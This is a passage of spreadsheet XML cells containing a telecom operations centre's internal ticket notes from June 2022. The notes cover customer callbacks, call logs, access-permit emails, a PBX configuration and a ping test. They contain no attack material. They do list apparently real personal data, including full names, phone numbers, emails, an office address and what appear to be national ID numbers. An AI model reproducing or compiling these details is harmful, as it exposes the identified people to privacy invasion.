PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 23/06/2022 09:30:30</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  MARCELINO HERNANDEZ-78730116  ## 2 VECES ## MANDA A BUZON ##
1001809748
COLA:
NOMBRE: A: 0050378730116
NÚMERO: 0050378730116
DURACIÓN: 0:00:23
ESTADO: MARCANDO
DETALLES: 0050378730116
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 23/06/2022 09:29:12
1001809960
COLA:
NOMBRE: A: 0050378730116
NÚMERO: 0050378730116
DURACIÓN: 0:00:07
ESTADO: MARCANDO
DETALLES: 0050378730116
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 23/06/2022 09:29:41</t>
  </si>
  <si>
    <t>SE HA LLAMADO A CLIENTE N CARLOS AYALA  79390774## MANDA A BUZON 3 VECES ## SE INTENTARA LUEGO</t>
  </si>
  <si>
    <t>CLIENTE NO ESCUCHA
1001631557
COLA:
NOMBRE: A: 0050379390774
NÚMERO: 0050379390774
DURACIÓN: 0:01:02
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050379390774
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 22/06/2022 11:43:00</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS AYALA  79390774
RESULTADO: CONTESTADA
NOMBRE: 54605044
NÚMERO: 54605044
INICIO: HOY, 11:11
FIN: HOY, 11:16
DURACIÓN: 4:51
ID DE LLAMADA: 1001619605</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  CARLOS AYALA  79390774 ##NO CONTESTA##ENVIA A BUZON## SE INTENTARA EN BRVE ##VIVO</t>
  </si>
  <si>
    <t>SE OBSERVA QUE YA ESTA EL DICTAMEN. SE PROCEDE A ENVIAR A LCIENTE
DE: HUGO ALEJANDRO JUAREZ LOPEZ &lt;HUGOA.JUAREZ@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 24 DE JUNIO DE 2022 14:26
PARA: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;
ASUNTO: RE: SOLICITUD DE RFO || MINISTERIO DE GOBERNACION Y DESARROLLO TERRITORIAL || F4612102
BUEN DÍA ESTIMADOS,
SE ADJUNTA EL DICTAMEN SOLICITADO.
DOCUMENTO DAJUNTO:
DTDI-NOC-880-22 ¿ MINISTERIO DE GOBERNACION Y DESARROLLO TERRITORIAL - ENLACE 26657100SV - INCIDENTE SD1137543
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4612106</t>
  </si>
  <si>
    <t>-* SE HABLA CON RONAL ZAVALA (CLIENTE) INFORMA QUE TIENE A UN TEC EN SITIO, SOLICITA SE HABLE CON LUIS DE LEON 59460681, SE LLAMA Y NO RESPONDE, SOLICITA SE HABLE CON LENIN 54419350,  INFORMA QUE NO ESTA EN EL LUGAR, SOLICITA SE LE LLAME EN 5 MINUTOS, ADICIONAL RONAL COMENTA QUE EL FG NO ENCIENDE -*
-*</t>
  </si>
  <si>
    <t>F4612114</t>
  </si>
  <si>
    <t>CLIENTE DESCONOCE DE EQUIPOS TECNICOS, SOLICITA VISITA TECNICA PARA CERTIFICAR LA CONEXION HACIA INTERNET, SE LE INFORMA QUE UNICAMENTE SE LE DEMOSTRARA LA CONEXION CON UNA PC, DIRECTAMENTE CONECTADA AL ROUTER</t>
  </si>
  <si>
    <t>F4612116</t>
  </si>
  <si>
    <t>*/*/*/SE CONTACTA A GESTOR SAMUEL.ESTRADAG ID: 1001691796 PARA SOLICITAR APOYO DE ENVÍO DE GRÁFICAS SOLICITADAS POR EL CLIENTE*/*/*/</t>
  </si>
  <si>
    <t>F4612119</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE EDWIN DURAN QUIEN VALIDA Y AUTORIZA EL CIERRE.
1001682058
COLA:
NOMBRE: A: 0050322348300
NÚMERO: 0050322348300
DURACIÓN: 0:00:18
ESTADO: CONECTADA
DETALLES: 0050322348300
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 22/06/2022 14:13:58</t>
  </si>
  <si>
    <t>F4612132</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22437253  MENCIONA QUE SE TIENE FALLA DE ENERGIA EN PR
-ID 1001611326</t>
  </si>
  <si>
    <t>F4612134</t>
  </si>
  <si>
    <t>##CLIENTE CONFIRMA CORREO, ESTAMOS A LA ESPERA DE PRMISOS POR PARTE DE COMERCIAL## CLIENTE INDICA QUE SE LE MARQUE EN 30  MINUTOS SI NO HAY RESPUESTA + SE DA CODIGO E CIERRE A TECNICO ALBERTO ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA AL CIENTE SAIDA   23824035-39 OCNTESTA SEÑORITA HEISEL GONZALES Y NOS COFIRMA QUE LOS PERMISOS ESTAN PARA MAÑANA A LAS 3PM- ## NOS CONFIRMARA NEUVAMENTE VIA CORREO ##VIVO</t>
  </si>
  <si>
    <t>CLEITEN NO S INDICA QUE SE LLAME  A SAIDA   23824035-39 ##VIVO</t>
  </si>
  <si>
    <t>SE RECIBE LLAMAADA E TECNICO, INDICA QUE REALIZO REEMPALMES ###  + EN ESTE MOMENTO NO TIENE SEÑAL DE PBX- SES OBSERVA EN CORREO QUE YA SE TIENE RESPUESTA ##
DE: SAYDA ZAMORA &lt;ADMINISTRACION@EUROPLAZAWORLD.COM&gt;
ENVIADO: MIÉRCOLES, 22 DE JUNIO DE 2022 16:43
PARA: MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;; SECRETARIA@SOLUCIONESLEGALES.COM.GT &lt;SECRETARIA@SOLUCIONESLEGALES.COM.GT&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; ACCESOS EMPRESARIALES &lt;ACCESOSEMPRESARIALES@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
CC: HEISEL GONZALEZ &lt;EURORECEPCION@EUROPLAZAWORLD.COM&gt;; 'PROTECCION TOTAL.S.A' &lt;JEFEDEPROYECTOEUROPLAZA@GMAIL.COM&gt;; SIERRA1MENDOZA.GT@GMAIL.COM &lt;SIERRA1MENDOZA.GT@GMAIL.COM&gt;; DONISVASQUEZ60@GMAIL.COM &lt;DONISVASQUEZ60@GMAIL.COM&gt;
ASUNTO: RE: GDN 23906500 ||OFICINA PROFESIONAL DE RECUPERACION DE VALORES S.A.-
BUENAS TARDES, CON GUSTO.
POR SER EMERGENCIA PUEDEN PROCEDER A RESOLVER EL INCONVENIENTE AL CLIENTE.
SALUDOS.
       AUTORIZADO
CUIDEMOS EL MEDIO AMBIENTE, POR FAVOR, NO IMPRIMA ESTE CORREO ELECTRÓNICO SI NO ES NECESARIO. ÁRBOL DE HOJAS GRATIS DIBUJOS ANIMADOS IMÁGENE¿ILLUSTOON ES</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SUSANA MORAN-34120912 COMENTA QUE AUN NO TIENE RESPUESTA ##VIVO</t>
  </si>
  <si>
    <t>SE LAMA A CLIENTE SUSANA MORAN-34120912  ##
1001653488
COLA:
NOMBRE: A: 34120912
NÚMERO: 34120912
DURACIÓN: 0:00:16
ESTADO: CONECTADA
DETALLES: 34120912
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 22/06/2022 12:43:54</t>
  </si>
  <si>
    <t>SE HA ENVIADO CORREO A CLIENTE Y A CENTRO COMEERCIAL PARA QUE NOS APOYEN CON GESTION DE PERMISOS HACIA LAS INSSTALACIONES-
DE: MARIA ISABEL GODINEZ SAENZ
ENVIADO: MIÉRCOLES, 22 DE JUNIO DE 2022 15:30
PARA: ADMINISTRACION@EUROPLAZAWORLD.COM &lt;ADMINISTRACION@EUROPLAZAWORLD.COM&gt;; SECRETARIA@SOLUCIONESLEGALES.COM.GT &lt;SECRETARIA@SOLUCIONESLEGALES.COM.GT&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; ACCESOS EMPRESARIALES &lt;ACCESOSEMPRESARIALES@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: GDN 23906500 ||OFICINA PROFESIONAL DE RECUPERACION DE VALORES S.A.-
BUENA TARDE ESTIMADOS, CON RESPECTO AL E1:
GDN 23906500
OFICINA PROFESIONAL DE RECUPERACION DE VALORES S.A.-
 5 AVENIDA 5-45 ZONA 14, EDIFICIO EUROPLAZA, TORRE 2 TERCER NIVEL OFICINA 302
SOLICITO SU APOYO PARA LA GESTIÓN DE PERMISOS AL EDIFICIO Y TAMBIÉN EL INGRESO A LOS DUCTOS Y CAJA INTERNA DENTRO DE SUS INSTALACIONES, ESPECÍFICAMENTE TORRE 2.
2149405940103       JAVIER DANILO CHETE CHAJON
2487190760115       JUAN ALBERTO TRUJILLO ORTIZ
2334846120101       JOSE CARLOS LOARCA
2567601310101       JOSHUA ALEXANDER ROMERO ROSALES
QUEDAMOS ATENTOS A LOS PERMISOS, FAVOR CONFIRMAR POR ESTE MEDIO
SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;</t>
  </si>
  <si>
    <t>F4612136</t>
  </si>
  <si>
    <t>SE ENVIO CORREO AL CLIENTE CON LA CONFIGURACION DE LA PBX
BUENAS TARDES
ENVIÓ LA CONFIGURACIÓN DE LA PBX.
GATEWAY 192.168.208.74
IP PBX 10.174.209.86
LA PBX NO LLEVA REGISTRO.
SALUDOS.</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A ELIEZER JIMÉNEZ/CLIENTE INDICA QUE SE LE CORTÓ LA LLAMADA CON HUGO SOTO/GESTOR AE; SE HACE DE NUEVO LA TRIPARTITA ENTRE ÉSTOS, EN ESPERA DE LO QUE DETERMINEN.</t>
  </si>
  <si>
    <t>EN CONFERENCIA CON EL CLIENTE ELIAZAR JIMENEZ INDICA QUE REINCIARON EL PUERTO DE LA TRONCAL Y EL SERVICIO QUEDO ACTIVO.
CLIENTE VALIDA Y AUTORIZA EL CIERRE.</t>
  </si>
  <si>
    <t>F4612137</t>
  </si>
  <si>
    <t>POR EQUIVOCACION NO SE COLOCO CRONOLOGIA SIN EMBARGO CLIENTE NO HA RESPONDIDO CORREO ENVIADO
°° SE ENVIO CORREO A CLIENTE PARA VALIDAR SI ES POSIBLE REALIZAR PRUEBAS EN CONJUNTO Y VALIDAR COMPORTAMIENTO CUANDO CONMUTA SERVICIO HACIA SU PROVEEDOR Y VER SI CLARO CAE .
RE: ENLACE DE DF MAZATENANGO ID: 344400042</t>
  </si>
  <si>
    <t>F4612141</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANGEL RODRIGUEZ 25069510 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001699480</t>
  </si>
  <si>
    <t>F4612142</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE PEDRO HERNRIQUEZ 61801782 PERO SIGUE SIN TENER RESPUESTA, SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE PEDRO HERNRIQUEZ 61801782 PERO NO SE TIENE RESPUESTA, SE PROBARA NEUVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE  PEDRO HERNRIQUEZ 61801782 PARA REALIZAR PRUEBAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE PEDRO HERNRIQUEZ 61801782 DESPUES DE TRES INTENTOS NO SE TIENE RESPUESTA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4612149</t>
  </si>
  <si>
    <t>CLIENTE  HECTOR CALDERON SOLICITA AVANCES DEL SERVICIO SE LE MENCIONA QUE SE ESTAN REALIZANDO VALIDACIONES Y LE ESTARAN DEVOLVIENDO LA LLAMDA
CLIENTE BRINDA CONTACTO DE PR 56980958 - JOSE ROBERTO TAX
-ID 1001689187</t>
  </si>
  <si>
    <t>F4612167</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JACQUELINNE APARICIO 74714873 NO RESPONDE ||  ENVIA DIRECTO A BUZON || SE INTENTARA LUEGO**
-ID 1001663313
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JACQUELINNE APARICIO AL 74714873 NO RESPONDE | ENVIA A BUZON
SE INTENTARA LUEGO **
-ID 1001793558
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JACQUELINNE APARICIO AL 74714873 NO RESPONDE | ENVIA A BUZON
SE INTENTARA LUEGO **
-ID 1001780917
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JACQUELINNE APARICIO AL 74714873 NO RESPONDE | ENVIA A BUZON
SE INTENTARA LUEGO **
-ID 1001801815
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JACQUELINNE APARICIO 74714873 PERO  ENVIA DIRECTO A BUZON
-ID 1001631079</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JACQUELINNE APARICIO 74714873 ENVIA DIRECTO A BUZON
-ID 1001731690</t>
  </si>
  <si>
    <t>SE TRATA DE CONTACTAR A CLIENTE PERO NO SE TIENE RESPUESTA, SE VALIDARA EL DIA DE MAÑANA VISITA TECNICA
[20:00] JUAN CARLOS LOPEZ SANCHEZ
1001767924
COLA:
NOMBRE: A: 50376753814
NÚMERO: 50376753814
DURACIÓN: 0:00:40
ESTADO: MARCANDO
DETALLES: 50376753814
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 22/06/2022 20:00:05</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EN TRES OCACIONES PERO NO SE TIENE RESPUESTA SE INTENTARA MAS TARDE ES NESARIO VALIDAR SI ESPERA A TECNICOS DESPUES DE LAS 21:00 HRS
1001759649
COLA:
NOMBRE: A: 50376753814
NÚMERO: 50376753814
DURACIÓN: 0:00:40
ESTADO: CONECTADA
DETALLES: 50376753814
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 22/06/2022 18:44:41
1001759772
COLA:
NOMBRE: A: 50374714873
NÚMERO: 50374714873
DURACIÓN: 0:00:15
ESTADO: MARCANDO
DETALLES: 50374714873
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 22/06/2022 18:45:13
1001759937
COLA:
NOMBRE: A: 50376753814
NÚMERO: 50376753814
DURACIÓN: 0:00:35
ESTADO: MARCANDO
DETALLES: 50376753814
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 22/06/2022 18:46:50</t>
  </si>
  <si>
    <t>F4612171</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ASESOR DE VENTAS AL  41579581  NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO**
-ID 1001663823
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 41579581  NO RESPONDE, SE INTENTARA LUEGO
-ID 1001631811</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 41579581  MENCIONA QUE YA OBSERVA EL SERVICIO OPERATIVO
-ID 1001728717</t>
  </si>
  <si>
    <t>F4612172</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JULIO BARRIENTOS-54286371   ###  VALIDA ##
1001647991
COLA:
NOMBRE: A: 54286371
NÚMERO: 54286371
DURACIÓN: 0:00:34
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 54286371
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 22/06/2022 12:28:35</t>
  </si>
  <si>
    <t>F4612187</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS LOBOS AL 30249920  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 1001665761
**</t>
  </si>
  <si>
    <t>F4612191</t>
  </si>
  <si>
    <t>F4612194</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSMAN FLORES AL 50176084 INDICA QUE NO ESTA EN EL SITIO SOLICITA QUE SE LE LLAME EN 25 MIN PARA CONFIRMAR **
-ID 1001714586
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSMAN FLORES AL 50176084 CONFIRMA SERVICIO ESTABLE Y OPERATIVO  **
-ID 1001724390 - 1001725907
**</t>
  </si>
  <si>
    <t>F4612198</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE CLIENTE SOLICITANDO A PERSONAL DE GRPO MONGE VALIDAR QUE EQUIPO DE CLARO ESTE CONECTADO A UPS
CARLOS FERNANDO LEAL GONZALEZ &lt;CARLOS.LEAL@GRUPOMONGE.COM&gt;
@GUSTAVO ADOLFO MONTEPEQUE GAMBOA APÓYAME PORFA A VALIDAR QUE EL EQUIPO DE CLARO ESTE CONECTADO AL UPS EN LA LÍNEA DE BAKCUP DE CARGA Y NO EN LA DE SOLO SUPRESOR DE PICOS, RECUERDO QUE YA HABÍAMOS ENVIADO ESTE UPS Y ES PROBABLE QUE ESTE EN LA LÍNEA INCORRECTA.
QUEDAMOS ATENTOS, GRACIAS.
SALUDOS,
CARLOS LEAL
COORDINADOR DE SOPORTE LOCAL TI GT | SÍ SE PUEDE!
LOGOFIRMA
EXT: +502 1091
CEL: +502 5516 8193</t>
  </si>
  <si>
    <t>SE PROCEDE A ENVIAR CORREO SEGUN LO SOLICITADO || SE HABLA CON CARLOS LEAL , SE LE INFORMA DEL INCONVENIENTE SOBRE REINICIOS CONSTANTES EN EQUIPO, SE CONSULTA SI CUENTA CON UPS, INDICA QUE ESTARA VALIDANDO SI TIENEN PROGRAMADO MANTENIMIENTO POR LO QUE SOLICITA SE ENVIE CORREO, SE INFORMA QUE SE HAN ENVIADO CORREOS PERO NO SE HA TENIDO RESPUESTA, BRINDA DE NUEVO CARLOS.LEAL@GRUPOMONGE.COM , SE ENVIARA DE NUEVO
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CARLOS,
SEGÚN LO CONVERSADO VÍA TELEFÓNICA PARA EL ENLACE DE LA TIENDA CC_GMG_GT_INTERNET_TIENDA_090, SOLICITAMOS SU APOYO VALIDANDO SI SE CUENTA CON UPS Y SI ESTE SE ENCUENTRA EN BUEN ESTADO YA QUE SE OBSERVAN REINICIOS CONSTANTES SOBRE EL EQUIPO. QUEDO AL PENDIENTE DE SUS COMENTARIOS.
TICKET: F4612198
ID: 313900308T
IDENTIFICADOR DEL CLIENTE: CC_GMG_GT_INTERNET_TIENDA_090
UBICADO EN: INTERNET_8 CALLE 04-37 ZONA 03 BARRIO LA JOYA SAN MARTIN JILOTEPEQUE CHIMALTENANGO
SALUDOS</t>
  </si>
  <si>
    <t>SE HABLA CON CARLOS LEAL , SE LE INFORMA DEL INCONVENIENTE SOBRE REINICIOS CONSTANTES EN EQUIPO, SE CONSULTA SI CUENTA CON UPS, INDICA QUE ESTARA VALIDANDO SI TIENEN PROGRAMADO MANTENIMIENTO POR LO QUE SOLICITA SE ENVIE CORREO, SE INFORMA QUE SE HAN ENVIADO CORREOS PERO NO SE HA TENIDO RESPUESTA, BRINDA DE NUEVO CARLOS.LEAL@GRUPOMONGE.COM , SE ENVIARA DE NUEVO
ID
1001925561
COLA:
NOMBRE: A: 55168193
NÚMERO: 55168193
DURACIÓN: 0:01:33
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 55168193
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 23/06/2022 15:15:18</t>
  </si>
  <si>
    <t>SE INTENTA LLAMA CARLOS LEAL PERO NO SE TIENE RESPUESTA DEL CLIENTE
1001881344
COLA:
NOMBRE: A: 55168193
NÚMERO: 55168193
DURACIÓN: 0:00:45
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55168193
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 23/06/2022 12:51:15</t>
  </si>
  <si>
    <t>F4612202</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALDO ORELLANA 76157618 MENCIONA QUE YA TODO ESTA FUNCIONANDO
-ID 1001695651</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE ALDO ORELLANA 76157618 - 75873169 PARA REALIZAR PRUEBAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4612216</t>
  </si>
  <si>
    <t>SE LLLAMA A CLIENTE CARLOS CHICOL 56579437 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001753920</t>
  </si>
  <si>
    <t>F4612224</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  EVA MORATAYA AL 54020600 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 1001644350
**</t>
  </si>
  <si>
    <t>F4612233</t>
  </si>
  <si>
    <t>SELLAMA A CLIENTE EMI PALENCIA 49328491 MENCIONA QUE EL SERVICIO ESTA FUNCIONANDO BIEN PERO INDICA QUE POR MOMENTOS ES LENTO
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001655543</t>
  </si>
  <si>
    <t>F4612252</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE CESAR GIRON 54620902 PARA VALIDAR PERO ENVIA A BUZON 54620902 // 50698135. ID: 1001675209, 1001675397</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CESAR GIRON AL 54620902 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 1001680500
**</t>
  </si>
  <si>
    <t>CLIENTE CESAR GIRON 54620902 VALIDA QUE EL E1 YA SE ENCUENTRA ACTIVO, POSIBLEMENTE SE DEBIÓ A TEMA DE ENERGÍA EN SUS INSTALACIONES, SE VALIDA E1 ACTIVO A NIVEL DE IP, CLIENTE REALIZA PRUEBAS DE LLAMADAS ENTRANTES Y SALIENTES Y CONFIRMA QUE YA TIENE LLAMADAS EN AMBAS VIAS.
ID DE LLAMADA: 1001648361
&lt;GNCYGTUTN1C1B08B02EIM3&gt;PING -C 1500 -S 1500 -M 30 -B -VPN-INSTANCE IP_PBX_ACCESO 10.174.180.210
  PING 10.174.180.210: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.174.180.210 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/11 MS</t>
  </si>
  <si>
    <t>F4612254</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE CHAVEZ AL NUMERO 40619667 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 1001668923
**</t>
  </si>
  <si>
    <t>F4612262</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARCELO BRAND 96395241 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001661135</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARCELO BRAND 96395241 NO RESPONDE, SE INTENTARA LUEGO**
-ID 1001669504
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARCELO BRAND 96395241 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001650092</t>
  </si>
  <si>
    <t>F4612275</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARVIN DELGADO AL 53354113 - 22259421 NO RESPONDE EN EL PRIMER NUMERO EN EL SEGUNDO RESPONDEN Y DEJAN EN ESPERA Y NO RETOMANLLAMADA **
-ID 1001671869- 1001672136
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE CORADO 22259499 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001933705</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE CORADO 22259499 PARA BRINDAR RETROALIMENTACION PERO NO RESPONDE
-ID 1001863924</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARVIN DELGADO 53354113 PARA BRINDAR RETROALIMENTACION
-ID 1001863336</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE CORADO 22259499 MENCIONA QUE EL HORARIO DE ATENCION ES DE 8:00 - 17:00 HRS POR LO QUE SOLICITA VISITA PARA MAÑANA A LAS 8:00 HRS
-ID 1001741194</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE CORADO AL 22259499 NO RESPONDE PARA CONFIRMAR ACCESOS **
-ID 1001681154
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARVIN DELGADO AL 53354113 INDICA QUE ESTAN ESPERANDO AL PERSONAL TECNICO QUE PUEDEN LLEGAR **
-ID 1001681725
**</t>
  </si>
  <si>
